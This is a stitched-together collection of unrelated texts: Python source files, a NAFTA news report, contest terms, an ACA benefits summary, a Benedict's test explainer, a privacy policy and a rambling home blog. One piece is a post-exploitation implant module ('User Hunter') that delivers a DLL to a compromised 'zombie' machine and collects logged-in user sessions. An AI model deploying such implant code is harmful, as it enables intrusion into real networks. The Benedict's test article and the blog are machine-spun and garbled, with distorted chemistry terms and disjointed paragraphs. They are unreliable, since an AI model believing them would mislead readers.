return model.updated_at.strftime('%d %B %Y, %H:%M')
def waiting_for_translation(self, model):
""" Flag doesn't display if translation prepared
"""
flags = ''
for item in settings.LANGUAGES:
if not Page_translation.objects.filter(page_id=model.id, lang=item[0]):
flags += """<img src="/static/themes/""" + settings.MYSMILE_THEME + \
"""/images/flags/""" + item[0] + """.png" alt= " """ + \
item[1] + """ "/>"""
return flags
waiting_for_translation.short_description = 'waiting for translation'
waiting_for_translation.allow_tags = True
def get_list_display(self, request):
"""
Hide empty colums "photo_thumb" and "waiting_for_translation"
"""
pages = Page.objects.all().count()
pages_translation = Page_translation.objects.all().count()
pages_blankphoto = Page.objects.filter(photo='').count()
self.list_display = ('slug', 'status', 'ptype', 'sortorder',)
if pages_blankphoto < pages: # at least one photo exist
self.list_display += ('photo_thumb', )
if pages*len(settings.LANGUAGES) != pages_translation:
self.list_display += ('waiting_for_translation',)
return self.list_display + ('date_update',)
def get_fieldsets(self, request, obj=None):
fieldsets = super(PageAdmin, self).get_fieldsets(request, obj)
if obj:
photo = Page.objects.filter(id=obj.id).values_list('photo', flat=True)[0]
if photo:
fieldsets = [('Settings', {'fields': ['slug', 'status', 'ptype', 'sortorder',
'color', ('photo', 'photo_thumb')]}), ]
else:
fieldsets = [('Settings', {'fields': ['slug', 'status', 'ptype', 'sortorder',
'color', ('photo',)]}), ]
return fieldsets
admin.site.register(Page, PageAdmin)
|
“There is no political necessity to keep Canada in the new NAFTA deal. If we don't make a fair deal for the US after decades of abuse, Canada will be out,” Trump tweeted on Saturday, a day after the trade negotiations with Canada were upended by leaked off-the-record remarks he made to Bloomberg.
Trump, who has repeatedly branded the North American Free Trade Agreement (NAFTA) the “worst trade deal ever made,” reiterated that he will not back down from his pledge to quit the deal, if his concerns are not met. “We make new deal or go back to pre-NAFTA!” he tweeted.
Trump previously set a deadline for Friday to reach the trilateral deal. When the US-Canada trade talks eventually missed the deadline, US Trade Representative Robert Lighthizer said that Trump had asked Congress to approve the bilateral agreement with Mexico, notifying lawmakers of his intention within the three-month period prescribed by the law.
Moving ahead towards securing the trade deal with Mexico does not mean Washington is ceasing attempts to agree a deal with Canada, Lighthizer noted. “Our officials are continuing to work toward agreement,” he said, adding that the talks will be resumed on Wednesday.
The NAFTA was signed by Canada, Mexico, and the United States in 1993 and came into force in 1994, during the presidency of Bill Clinton. The longstanding trilateral deal was roundly criticized by the protectionist right, as well as the anti-globalization left, particularly for the damage that eliminating tariffs did to the American auto industry.
Without the impediment of tariffs, auto manufacturers moved their operations south of the border, wreaking havoc on former manufacturing hubs like Detroit, Michigan, and Cleveland, Ohio. According to a study on the deal effects back in 2013, NAFTA was directly responsible for raising the US trade deficit with Mexico from $17 billion to $177 billion, and cost the US over 850,000 jobs.
In June this year, Washington introduced a 25-percent tariff on steel imports and a 10-percent tariff on aluminum imports from Mexico, Canada and the EU. Mexico swiftly retaliated with import tariffs on some American goods, including steel, apples and pork. Ottawa introduced retaliatory taxes on US imports of steel, aluminum and such goods as whiskey, orange juice and other food products .
|
# Copyright (C) 2012 Statoil ASA, Norway.
#
# The file 'sched_file.py' is part of ERT - Ensemble based Reservoir Tool.
#
# ERT is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ERT is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE.
#
# See the GNU General Public License at <http://www.gnu.org/licenses/gpl.html>
# for more details.
from ert.cwrap import BaseCClass, CWrapper
from ert.sched import SCHED_LIB
from ert.util import CTime
class SchedFile(BaseCClass):
def __init__(self, filename, start_time):
c_ptr = SchedFile.cNamespace().parse(filename, CTime(start_time))
super(SchedFile, self).__init__(c_ptr)
@property
def length(self):
""" @rtype: int """
return SchedFile.cNamespace().length(self)
def write(self, filename, num_dates, add_end=True):
SchedFile.cNamespace().write(self, num_dates, filename, add_end)
def free(self):
SchedFile.cNamespace().free(self)
cwrapper = CWrapper(SCHED_LIB)
cwrapper.registerType("sched_file", SchedFile)
cwrapper.registerType("sched_file_obj", SchedFile.createPythonObject)
cwrapper.registerType("sched_file_ref", SchedFile.createCReference)
SchedFile.cNamespace().parse = cwrapper.prototype("c_void_p sched_file_parse_alloc( char*, time_t )")
SchedFile.cNamespace().write = cwrapper.prototype("void sched_file_fprintf_i( sched_file , int , char* , bool)")
SchedFile.cNamespace().length = cwrapper.prototype("int sched_file_get_num_restart_files( sched_file )")
SchedFile.cNamespace().free = cwrapper.prototype("void sched_file_free( sched_file )")
|
Buy any Hankook car, van or 4×4 tyre at an Eden Tyres & Servicing branch before the 31st March 2019 for your chance to win!
The first prize includes 2 x VIP tickets to watch Real Madrid at the Santiago Bernabeu Stadium with flights and hotel accommodation. Second prize is an Xbox One X with FIFA 19 and weekly runners up will win a Real Madrid Shirt and football.
The competition is open to any customer buying a Hankook tyre from a participating retailer. Each customer will be given a card showing a unique reference number for each tyre purchased. To enter the competition, the customer will need to log onto real-madrid.uk.hankook.win, enter the unique reference number shown on the card, register their name and contact details and answer the question shown on the card. The customer will receive an automated email acknowledging and confirming the entry via the website.
The customer must retain their unique reference number card and receipt in order to claim their prize.
Customers entering the competition in accordance with the above conditions will be entered into a draw to win two VIP Real Madrid tickets. The winner will be notified by telephone or email, using the contact details provided when registering to enter.
Two VIP Hospitality tickets to see a Real Madrid match at the Santiago Bernabéu stadium. The tickets, date and time of the match will be chosen at Hankook Tyres’ discretion.
One night’s accommodation for the winner and one guest in a hotel selected by Hankook Tyres on a Bed & Breakfast basis sharing one twin or double room. The winner will require a current debit or credit card with sufficient funds available in order to check in at the hotel for security deposit purposes and for any additional room charges.
The prize does not include transport to and from any airport, meals or drinks (other than those specified), excursions, attractions, treatments, car hire, travel insurance, personal expenses, visa, vaccinations and any other costs not specified as part of the prize.
The winner’s guest must be 18 years or older. The winner and their guest must hold a current passport valid for a minimum of six months on the date of departure from the UK. The winner is also responsible for obtaining any other relevant travel documentation required to travel to and gain entry to Spain, including adequate insurance without limitation covering overseas medical costs and ensure the travelling party adheres to the travel itinerary and other relevant safety instructions as set out by Hankook Tyres.
The winner must provide passport details for both themselves and their guest. The winner is responsible for informing Hankook Tyres of any wheelchair or special requirements for the winner and/or their guest and for ensuring they adhere to any applicable health and safety guidelines. The winner and their guest shall also comply with all local Spanish laws.
The winner acknowledges that Hankook Tyres will have no responsibility and is not obliged to offer any alternative prize if the Real Madrid game does not take place for any reason, or if any flight arranged by Hankook Tyres is cancelled, postponed or delayed for whatever reason. No alternative prize will be offered if the winner or their guest is unable, for whatever reason, to travel.
The winner or their guest must not be subject to any football banning orders or past convictions related to football hooliganism. Hankook Tyres reserve the right to conduct checks against the prize winners in such circumstances.
The winner may be required to take part in promotional activity related to the prize draw and shall participate in that activity at Hankook’s reasonable request. By entering the competition, you consent to Hankook Tyres using your name, photograph, voice and image for publicity purposes in any medium and in advertising, marketing and promotional material without additional compensation or prior notice. This consent applies both before and after the prize draw takes place for an unlimited time.
Additionally, all valid entries will be entered in a draw at the end of the promotion for a 2nd prize to win an Xbox One X with FIFA 19 and weekly draws, where the winners will be awarded a Real Madrid football and shirt. Each winner will be notified by phone call or email using the contact details which they used to enter. If the prize is not claimed within 14 days after this call or email, the prize will be withdrawn.
|
import core.implant
import core.job
import string
import uuid
class UserHunterJob(core.job.Job):
def create(self):
self.fork32Bit = True
self.options.set("DLLUUID", uuid.uuid4().hex)
self.options.set("MANIFESTUUID", uuid.uuid4().hex)
self.options.set("DIRECTORY", self.options.get('DIRECTORY').replace("\\", "\\\\").replace('"', '\\"'))
def report(self, handler, data, sanitize = False):
data = data.decode('latin-1')
task = handler.get_header(self.options.get("UUIDHEADER"), False)
if task == self.options.get("DLLUUID"):
handler.send_file(self.options.get("DYNWRAPXDLL"))
return
if task == self.options.get("MANIFESTUUID"):
handler.send_file(self.options.get("DYNWRAPXMANIFEST"))
return
if len(data) == 0:
handler.reply(200)
return
if data == "Complete":
super(UserHunterJob, self).report(handler, data)
elif "***" in data:
self.parse_sessions_data(data)
handler.reply(200)
def parse_sessions_data(self, data):
self.print_good("Session data retrieved")
sessions = data.split("***")
for session in sessions:
if session:
user = session.split(":")[0]
if "$" in user:
continue # not concerned with machine accounts
comps = ", ".join(list(set(session.split(":")[1].split(","))))
self.shell.print_plain(user + " => " + comps)
self.results += user + " => " + comps + "\n"
def done(self):
self.display()
def display(self):
pass
# try:
# self.print_good(self.data)
# except:
# pass
class UserHunterImplant(core.implant.Implant):
NAME = "User Hunter"
DESCRIPTION = "Identifies and locates all logged in users"
AUTHORS = ["TheNaterz"]
STATE = "implant/gather/user_hunter"
def load(self):
self.options.register("DIRECTORY", "%TEMP%", "writeable directory on zombie", required=False)
self.options.register("DYNWRAPXDLL", "data/bin/dynwrapx.dll", "relative path to dynwrapx.dll", required=True, advanced=True)
self.options.register("DYNWRAPXMANIFEST", "data/bin/dynwrapx.manifest", "relative path to dynwrapx.manifest", required=True, advanced=True)
self.options.register("UUIDHEADER", "ETag", "HTTP header for UUID", advanced=True)
self.options.register("DLLUUID", "", "HTTP header for UUID", hidden=True)
self.options.register("MANIFESTUUID", "", "UUID", hidden=True)
def job(self):
return UserHunterJob
def run(self):
workloads = {}
workloads["js"] = "data/implant/gather/user_hunter.js"
self.dispatch(workloads, self.job)
|
On May 26, 2015, the Departments of Health and Human Services, Labor, and Treasury, jointly released the twenty-seventh set of FAQs on Affordable Care Act implementation issues. The FAQs clarify the application of the ACA’s out-of-pocket limit rules for plan years beginning in 2016.
In February, HHS “clarified” that the ACA’s out-of-pocket limits apply to each individual, even those enrolled in family coverage. For example, suppose an employee and spouse enroll in family coverage with an annual out-of-pocket limit of $13,000, and during the 2016 plan year, the spouse has $10,000 of out-of-pocket expenses and the employee has $3,000. Under the new rule, the spouse’s out-of-pocket expenses are capped at the individual limit of $6,850 (with the remaining $3,150 being covered by the plan). The employee is still subject to cost sharing, however, until the $13,000 plan limit is reached.
The FAQs confirm that HHS’ clarification applies to all non-grandfathered group health plans, including large group and self-insured plans. Meaning, starting with 2016 plan years, all non-grandfathered plans must contain an embedded individual out-of-pocket limit for family coverage. For these purposes, family coverage includes any tier of coverage other than employee-only.
The FAQs also confirm that these rules apply to high-deductible health plans (HDHPs). The embedded out-of-pocket limit rules do not impact HSA-qualified HDHPs, as a family HDHP will not be required to start paying medical claims under the ACA out-of-pocket rule until the minimum annual deductible for family HDHP coverage is satisfied. In other words, by the time the embedded individual out-of-pocket limit is reached, the employee will have satisfied the minimum annual deductible for HDHP coverage.
|
from django.conf import settings
from django.conf.urls import include, patterns, url
from django.contrib import admin
from django.shortcuts import redirect
from django.views.decorators.cache import cache_page
from django.views.i18n import javascript_catalog
admin.autodiscover()
handler403 = 'amo.views.handler403'
handler404 = 'amo.views.handler404'
handler500 = 'amo.views.handler500'
urlpatterns = patterns('',
# AMO homepage or Marketplace Developer Hub? Choose your destiny.
url('^$', settings.HOME, name='home'),
# Add-ons.
('', include('addons.urls')),
# Tags.
('', include('tags.urls')),
# Files
('^files/', include('files.urls')),
# AMO admin (not django admin).
('^admin/', include('zadmin.urls')),
# App versions.
('pages/appversions/', include('applications.urls')),
# Services
('', include('amo.urls')),
# Paypal
('^services/', include('paypal.urls')),
# Javascript translations.
url('^jsi18n.js$', cache_page(60 * 60 * 24 * 365)(javascript_catalog),
{'domain': 'javascript', 'packages': ['zamboni']}, name='jsi18n'),
# Redirect persona/xxx
('^getpersonas$',
lambda r: redirect('http://www.getpersonas.com/gallery/All/Popular',
permanent=True)),
url('^persona/(?P<persona_id>\d+)', 'addons.views.persona_redirect',
name='persona'),
# Redirect top-tags to tags/top
('^top-tags/?',
lambda r: redirect('tags.top_cloud', permanent=True)),
('^addons/contribute/(\d+)/?$',
lambda r, id: redirect('addons.contribute', id, permanent=True)),
)
if settings.TEMPLATE_DEBUG:
# Remove leading and trailing slashes so the regex matches.
media_url = settings.MEDIA_URL.lstrip('/').rstrip('/')
urlpatterns += patterns('',
(r'^%s/(?P<path>.*)$' % media_url, 'django.views.static.serve',
{'document_root': settings.MEDIA_ROOT}),
)
if settings.SERVE_TMP_PATH and settings.DEBUG:
urlpatterns += patterns('',
(r'^tmp/(?P<path>.*)$', 'django.views.static.serve',
{'document_root': settings.TMP_PATH}),
)
|
Benedict’s test is utilized to test for carbohydrates and non-reducing or reducing sugar. The Benedicts test separates reducing sugars (monosaccharide’s and some disaccharides), which have free ketone or aldehyde. Benedict’s answer can be utilized to test for the presence of glucose in urine.
A few sugars, for example, glucose are called reducing sugars since they are equipped for exchanging hydrogen (electrons) to different intensities and the procedure is called reducing. At the point when reducing sugars are blended with Benedict’s reagent and warmed, a decrease response causes Benedict’s reagent to change its coloring. The color fluctuates from green to dim red (block) or corroded cocoa, depending upon the measure of and sort of sugar.
Benedict’s quantitative reagent contains potassium thiocyanate and is utilized to decide the amount of reducing sugar which is available in the compound. This test frames a copper thiocyanate which is white and can be utilized as a part of a titration. The titration ought to be rehashed with 1% glucose arrangement rather than the specimen for adjustment.
This was named after American scientist Stanley Benedict. Benedict’s reagent (frequently sold as Benedict’s Qualitative Solution or Benedict’s Solution) is a synthetic reagent.
Benedict’s reagent is a compound reagent usually used to identify the presence of reducing sugars. However, other reducing substances additionally give a positive response. This incorporates all monosaccharides and numerous disaccharides, including lactose and maltose.
For the most part, Benedict’s test will identify the presence of aldehydes, and alpha-hydroxy-ketones incorporating those that happen in certain ketones. Along these lines, despite the fact that the ketose fructose is not entirely a reducing sugar, it is an alpha-hydroxy-ketone and gives a positive test since it is changed over to the aldoses glucose and mannose by the base in the reagent. A positive test with Benedict’s reagent appears.
This test has actually quite a simple principle. The guideline of Benedict’s test is that when reducing sugars are warmed in the presence of an antacid, they get changed over to decreasing mixtures known as enediols. Enediols decrease the cupric particles (Cu2+) present in Benedict’s reagent to cuprous particles (Cu+) which get encouraged as insoluble red copper oxide (Cu2O).
The shade of the obtained material gives a thought regarding the amount of sugar present in the compound. The test is semi-quantitative. A greenish color demonstrates around 0.5 g% focus, the yellow result shows 1 g% fixation, orange shows 1.5 g% and red shows 2 g% or higher focus.
At the point when reducing sugars are warmed in the essential compound, they shape effective reducing mixtures known as enediol. Enderle further reacts with cupric particles which are available in Benedict’s solution for cuprous ions. Thus, we distinguish the presence of reducing compounds. Here, it should be noticed that benedict’s reagent respond with decreasing sugars as well as give a positive result with other reducing solutions.
The procedure for this test is one of the easiest ones in the field of biological tests. With the help of little equipment, you become able to perform the test. The equipment needed for the test is a test tube, benedict’s solution, and the original solution. Once having all of this things, you can proceed with the following tests.
Take a test tube and in it, pour down 5 ml from your portion of benedict’s solution.
Now once you have poured down benedict’s solution, you will need to add 5 to 8 drops of the original you got in the test tube.
Start heating the solution after it is being added in the test tube gently.
What would be the results? You are going to know this after reading the precautions.
Before performing any scientific test, scientists have enlisted some precaution that is very necessary to be taken. If you fail to take these particular precautions, there are always chances that you test will be a failed one.
Quantity of the benedict’s solution is very important. Before performing the test, make sure that you measure the quantity of the benedict’s solution and this that you are having it in the right amount.
Heating the mixture should be a gentle procedure. Don’t try to be quick. Just keep it plain and gentle.
While adding the solution, just make sure that you adding only a few drops of it. Adding the solution in more quantity could ruin the whole process.
During the heating of the solution, make sure that it is not facing any human. Because on boiling the droplets could escape the test tube and burn the skin of any person who gets in contact.
The last thing is very important. If you don’t get results when boiling for the first time, do it again. There are possibilities that you may not get results on the first time heating but do get after heating twice or thrice.
After all these precautions are being followed, I am sure that your results will be 100% positive.
I am sorry that I had to keep you waiting for results. Now what would happen and what are going to be the results of Benedict’s test? How will you know that the test you are performing is negative or positive? Following are the results and observations.
In the case when sugar is reducible, the solution will change its color after the heating process. It is not necessary that it would happen after heating just once. As mentioned in the precautions, you should try heating twice or more than it and this might bring you results.
After heating the solution once, twice or thrice and the color remains same, then it means that the sugar in the solution is non-reducible.
So this was all from a very easy test to check for reducible sugar in the solution. Did our article help you in your study? Leave us your feedback in the comments section and stay tuned to our website!
|
import pyglet.window
import pyglet.image
class IsoRenderer(object):
""" Renders a 3D view of a map
"""
cam_rx, cam_ry, cam_rz = 45, 0, 0
cam_x, cam_y, cam_z = 0, 0, -1000
w, h = 640, 480
far = 10000
fov = 60
def __init__(self):
self.load_map()
self.create_window()
self.setup_gl_params()
def create_window(self):
self.window = pyglet.window.Window(fullscreen=False, resizable=True)
self.window.width=1280
self.window.height=800
self.window.on_resize=self.resize_view
def setup_gl_params(self):
pyglet.gl.glEnable(pyglet.gl.GL_BLEND)
pyglet.gl.glBlendFunc(pyglet.gl.GL_SRC_ALPHA, pyglet.gl.GL_ONE_MINUS_SRC_ALPHA)
pyglet.gl.glDepthFunc(pyglet.gl.GL_LEQUAL)
pyglet.gl.glEnable(pyglet.gl.GL_LINE_SMOOTH)
pyglet.gl.glHint(pyglet.gl.GL_LINE_SMOOTH_HINT, pyglet.gl.GL_DONT_CARE)
def load_map(self):
""" takes a PIL image.
"""
map_img = pyglet.image.load('img.gif')
self.map_tex = map_img.get_texture()
def draw_map(self):
pyglet.gl.glPushMatrix()
pyglet.gl.glTranslatef(-512, 0, 512)
pyglet.gl.glRotatef(-90, 1.0, 0.0, 0.0)
self.map_tex.blit(0, 0, 0, 1024, 1024)
pyglet.gl.glPopMatrix()
pyglet.gl.glColor4f(1.0, 0.0, 0.0, 1)
pyglet.gl.glLineWidth(1.5);
pyglet.gl.glBegin(pyglet.gl.GL_LINE_LOOP)
pyglet.gl.glVertex3f(512, 0, 512)
pyglet.gl.glVertex3f(-512, 0, 512)
pyglet.gl.glVertex3f(-512, 0, -512)
pyglet.gl.glVertex3f(512, 0, -512)
pyglet.gl.glEnd()
pyglet.gl.glColor4f(1.0, 1.0, 1.0, 1)
def render(self):
self.window.dispatch_events()
pyglet.gl.glClear(pyglet.gl.GL_COLOR_BUFFER_BIT | pyglet.gl.GL_DEPTH_BUFFER_BIT)
self.apply_camera()
self.draw_map()
self.window.flip()
def apply_camera(self):
pyglet.gl.glLoadIdentity()
pyglet.gl.glTranslatef(self.cam_x, self.cam_y, self.cam_z)
pyglet.gl.glRotatef(self.cam_rx,1,0,0)
pyglet.gl.glRotatef(self.cam_ry,0,1,0)
pyglet.gl.glRotatef(self.cam_rz,0,0,1)
def resize_view(self, width, height):
self.w,self.h=width,height
pyglet.gl.glViewport(0, 0, width, height)
pyglet.gl.glMatrixMode(pyglet.gl.GL_PROJECTION)
pyglet.gl.glLoadIdentity()
pyglet.gl.gluPerspective(self.fov, float(self.w)/self.h, 0.1, self.far)
pyglet.gl.glMatrixMode(pyglet.gl.GL_MODELVIEW)
|
Your IP address (this is your computer’s individual identification number) which is automatically logged by our web server. This is used to note your interest in our website. It is also possible that we will use your IP address to help diagnose problems on our web site. By submitting your information you consent to the use of that information as set out in this policy. If for any reason our policy does change, we will post the changes on this page so you can view them. If changes occur with which you are unhappy, you can email us with and instruct us to no longer use your information.
Aerial Vision will not be liable for damages arising out of or in connection with the use of this site in any way. This is a comprehensive limitation of liability that applies to all damages of any kind, including (without limitation) compensatory, direct, indirect, or consequential damages, loss of data, income or profit, loss of or damage to property and claims of third parties.
You may come across hyper-links on this site. These hyper-links may take you to sites operated by other organisations which we are not responsible for. When preparing our website we have taken every care possible. However, we have no control over any of the information you can access via other web sites. Therefore, no mention of any organisation, company, or individual to which our web site is linked shall imply any approval or warranty as to the standing and capability of any such organisations, company or individual on the part of Aerial Vision.
All design, text, graphics, and arrangement thereof are the copyright of Aerial Vision or of other copyright owners. Any unauthorised reproduction of the contents of this site without the prior written permission of Aerial Vision is strictly prohibited.
|
"""
.. module:: attachments
:platform: Unix, Windows
:synopsis: A module containing all attachment classes
.. moduleauthor:: Robert Grant <[email protected]>
This module contains classes for the different types of attachments.
"""
from ..api import endpoint
class Attachment:
"""Base class for attachments.
:param str type_: the type of the attachment
"""
def __init__(self, type_):
self.type = type_
def as_dict(self):
"""Return the attachment as a dictionary.
:returns: the attachment as a dictionary
:rtype: :class:`dict`
"""
return self.__dict__
class GenericAttachment(Attachment):
"""A generic attachment.
This attachment accepts any keyword arguments, but must be given a
particular type.
:param str type: the type of attachment
"""
def __init__(self, type, **kwargs):
super().__init__(type)
for k, v in kwargs.items():
setattr(self, k, v)
class Image(Attachment):
"""An image attachemnt.
Image attachments do not contain an image. Instead, they specify a URL from
which the image can be downloaded and must have a domain of
"i.groupme.com". Such URLs are known as "i" URLs, and are from the GroupMe
image service.
.. note::
Use the direct initializer *if and only if* the image already has a
known GroupMe image service URL. Otherwise, use the
:func:`~groupy.object.attachments.Image.file` method.
:param str url: the URL at which the image can be fetched from the GroupMe
image service
:param str source_url: the original URL of the image (optional)
"""
def __init__(self, url, source_url=None):
super().__init__('image')
self.url = url
self.source_url = source_url
def __repr__(self):
return "Image(url={!r})".format(self.url)
@classmethod
def file(cls, image):
"""Upload an image file and return it as an attachment.
:param image: the file containing the image data
:type image: :class:`file`
:returns: an image attachment
:rtype: :class:`~groupy.object.attachments.Image`
"""
return cls(endpoint.Images.create(image)['url'])
def download(self):
"""Download the image data of the image attachment.
:returns: the actual image the image attachment references
:rtype: :class:`PIL.Image.Image`
"""
return endpoint.Images.download(self.url)
class Location(Attachment):
"""An attachment that specifies a geo-location.
In addition to latitude and longitude, every location attachment also
specifies a name. Some (especially older) location attachments also contain
a ``foursquare_venue_id`` attribute.
:param str name: the location name
:param float lat: the latitude
:param float lng: the longitude
:param str foursquare_venue_id: the FourSquare venue ID (optional)
"""
def __init__(self, name, lat, lng, foursquare_venue_id=None):
super().__init__('location')
self.name = name
self.lat = lat
self.lng = lng
self.foursquare_venue_id = foursquare_venue_id
def __repr__(self):
return "Location(name={!r}, lat={!r}, lng={!r})".format(
self.name, self.lat, self.lng)
class Emoji(Attachment):
"""An attachment containing emoticons.
Emoji attachments do not contain any emoticon images. Instead, a
placeholder specifies the location of the emoticon in the text, and a
``charmap`` facilitates translation into the emoticons.
:param str placeholder: a high-point/invisible character indicating the
position of the emoticon
:param list charmap: a list of lists containing pack IDs and offsets
"""
def __init__(self, placeholder, charmap):
super().__init__('emoji')
self.placeholder = placeholder
self.charmap = charmap
def __repr__(self):
return "Emoji(placeholder={!r}, charmap={!r})".format(
self.placeholder, self.charmap)
class Split(Attachment):
"""An attachment containing information for splitting a bill.
This type of attachment is depreciated. However, such attachments are still
present in older messages.
:param str token: the token that splits the bill
"""
def __init__(self, token):
super().__init__('split')
self.token = token
def __repr__(self):
return "Split(token={!r})".format(self.token)
class Mentions(Attachment):
"""An attachment that specifies "@" mentions.
Mentions are a new addition to the types of attachments. Each contains two
parallel lists: ``user_ids`` and ``loci``. The elements in ``loci`` specify
the start index and length of the mention, while the elements in
``user_ids`` specify by user_id which user was mentioned in the
corresponding element of ``loci``.
.. note::
The length of ``user_ids`` must be equal to the length of ``loci``!
:param list user_ids: a list of user IDs
:param list loci: a list of ``(start, length)`` elements
"""
def __init__(self, user_ids, loci=None):
super().__init__('mentions')
self.user_ids = user_ids
self.loci = loci
def __repr__(self):
return "Mentions({!r})".format(self.user_ids)
class AttachmentFactory:
"""A factory for creating attachments from dictionaries.
"""
_factories = {
'image': Image,
'location': Location,
'emoji': Emoji,
'mentions': Mentions,
'split': Split
}
@classmethod
def create(cls, **kwargs):
"""Create and return an attachment.
:param str type: the type of attachment to create; if unrecognized, a
generic attachment is returned
:returns: a subclass of :class:`~groupy.object.attachments.Attachment`
"""
t = kwargs.pop('type', None)
try:
return cls._factories[t](**kwargs)
except (TypeError, KeyError):
# Either kwargs contianed an unexpected keyword for attachment type
# t, or t is not a known attachment type
return GenericAttachment(t, **kwargs)
|
SANTA CLARA, Calif., August 04, 2006 — SolutionSoft Systems Inc, a leading provider of Intelligent Data Optimization (IDO) solutions is pleased to announce the release of Time Machine for AIX 5LTM version 5.3, IBM’s latest UNIX operating system.
Time Machine® is a patent-pending software application designed to facilitate testing and simulation of specified system dates and times without modifying or resetting the system clock. This allows defined applications and users to run under any defined future date, past date or time zone desired while the underlying system time remains unchanged. With this ability Time Machine proves itself as a powerful tool for performing “what-if” testing on systems resources and programs. Time Machine’s unique solution for user-based time morphing for Unix and Windows Servers allows test environments to simultaneously run up to 20,000 individually defined virtual clocks at once and supports both group and user level time offsets.
“This release of Time Machine provides Solution-Soft with the ability to meet the ever-growing needs of our customers that rely on IBM’s server platforms and WebSphere environments to meet their respective application roll-outs as well as keep on track with their software enhancements.” said Michael Morrison, Director of business development as Solution-Soft.
|
# -*- coding: utf-8 -*-
import Tkinter as tk
import thread
import logging
class Application(tk.Frame):
def __init__(self, cube, master=None):
tk.Frame.__init__(self, master)
self.grid()
self.createWidgets()
self.cube = cube
def createWidgets(self):
self.quitButton = tk.Button(self, text='Tag Event',
command=self.onTag)
self.quitButton.grid()
self.tagStr = tk.StringVar()
self.userEntry = tk.Entry(self,textvariable=self.tagStr)
self.tagStr.set('USER:giloux@localhost:giloux')
self.userEntry.grid()
def onTag(self):
self.cube.tag_detection('NFC',self.userEntry.get())
def start_simulator(title,cube) :
app = Application(cube)
app.master.title(title)
app.mainloop()
def init(cube, params):
logging.info("Launching NFC simulator thread")
thread.start_new_thread(start_simulator,('NFC Simulator', cube))
#start_simulator()
|
Growing up in a small city in southern Poland, part of a religious family and conservative community, Maciej Gosniowski was told again and again that something was wrong with him. “It would be better if I changed myself,” he recalled teachers telling him. “It would be better if I behaved more like a boy. It would make my life easier.” Mr. Gosniowski was beaten by other students who used homophobic slurs he did not yet understand.
|
import sys
import os
import pylab as plt
import time
temp=plt.linspace(.6,1.28,20)
temp=[temp[20]]
ID = int(sys.argv[0].split('ID')[1].split('.py')[0])
print ID
print temp
for i in range(0,len(temp)):
#if i %4 != ID:
# continue
t=time.time()
print '%d of %d'%(i,len(temp))
os.system('python RG_fn.py %f'%temp[i])
os.system('python RG_fn.py %f'%temp[i])
os.system('python RG_fn.py %f'%temp[i])
os.system('python RG_fn.py %f'%temp[i])
os.system('python RG_fn.py %f'%temp[i])
os.system('python RG_fn.py %f'%temp[i])
os.system('python RG_fn.py %f'%temp[i])
os.system('python RG_fn.py %f'%temp[i])
os.system('python RG_fn.py %f'%temp[i])
os.system('python RG_fn.py %f'%temp[i])
os.system('python RG_fn.py %f'%temp[i])
os.system('python RG_fn.py %f'%temp[i])
os.system('python RG_fn.py %f'%temp[i])
os.system('python RG_fn.py %f'%temp[i])
os.system('python RG_fn.py %f'%temp[i])
os.system('python RG_fn.py %f'%temp[i])
os.system('python RG_fn.py %f'%temp[i])
os.system('python RG_fn.py %f'%temp[i])
os.system('python RG_fn.py %f'%temp[i])
os.system('python RG_fn.py %f'%temp[i])
os.system('python RG_fn.py %f'%temp[i])
os.system('python RG_fn.py %f'%temp[i])
os.system('python RG_fn.py %f'%temp[i])
os.system('python RG_fn.py %f'%temp[i])
os.system('python RG_fn.py %f'%temp[i])
elapsed = time.time()-t
print(elapsed)
|
A mama groundhog and her brood have torn up this flowerbed. We don’t have the guts to evict them. Karen Wodke, thanks for stopping by my hub. One thing we did wrong was say that we’d filter out everything around the yard. Effectively, this man needed even trellis we had for flowers removed. There was an outdated outhouse on the property he wanted that eliminated we refused. The boat house had issues in it he insisted or not it’s removed and should have been left with the boathouse. Here are some highlights of current items and I at all times take custom requests when time permits. Your insurer will ask you for an estimated value of your contents. However pricey items, usually ranging from £1,000 to £2,000, need to be separately listed to be coated on many insurance policies. Costly purchases such as laptops and jewelry (including engagement rings) is probably not covered if they have been bought after your coverage was taken out.
Howdy, would you be interested in contributing a few of your recommendation on our website as well? We’d be blissful to have you ever featured in a guest article. I’m a working from house Mother residing my dream and I know it may be carried out! All you need to do is set your thoughts on the task and work in direction of it with drive and fervour. I promise you… it may be done… when you’re prepared! There aren’t many good jobs obtainable and even with minimum wages jobs employers are being way too choosy…it’s kinda like the housing bubble for employers…when is it going to crash? I mean needing a university diploma to be a canine walker? Or a food handling certificate for Subway? Give me a break!
I want we may have purchased out my brother’s half of my mother’s 1978 ranch as a result of it was well insulated and solidly built by a very good contractor, a private pal of my family. However, it is 100 miles away and I wasn’t able to retire on the time. It was in superb form however beginning to deteriorate after being empty for 4 years, and it could not wait 5 more years for me to retire. I might like to search out one other similar to it. Oh my, there are tears in my eyes! I do not know how you got through this lens however I am so greatful that you did so. My girl Tidbit is 12 and so far no sight issues, but now I know the symtoms to search for from here on out. Thank you for sharing your knowlege of a blind canine. Blessings and a bit ‘ sunshine!
Whether or not you’re planning on doing professional video or just need to file house videos this is a number of good camcorders for the cash you may spend. Usually, once we go away, there’s little in the fridge. So we flip it down-that is, turn the dial to a higher number to make it hotter. No need for it to work so hard to cool a virtually empty house. The ABI says people shouldn’t rush into throwing away damaged gadgets, until they’re a hazard to their well being. Items might be able to be repaired or restored – your insurer will be capable to give you extra information on this.
A technique of trial and error, to see if altering the order in 2) can enhance the pace with which you entry the most cost effective quotes. As far as the boys bed room, we positioned the brown molding about 20 inches below the ceiling line. We actually did not measure at first, we simply eye balled it and marked where we thought it was pleasing to us. Then we used a laser level and blue tape to mark the line across the perimeter of the room. As soon as we painted above and beneath the tape, we removed the tape and nailed the trim over the bare tape line. Fairly easy and fast mission!
|
#!/usr/bin/python
# Copyright (c) 2018 Red Hat, Inc.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'certified'}
DOCUMENTATION = '''
---
module: nios_host_record
version_added: "2.5"
author: "Peter Sprygada (@privateip)"
short_description: Configure Infoblox NIOS host records
description:
- Adds and/or removes instances of host record objects from
Infoblox NIOS servers. This module manages NIOS C(record:host) objects
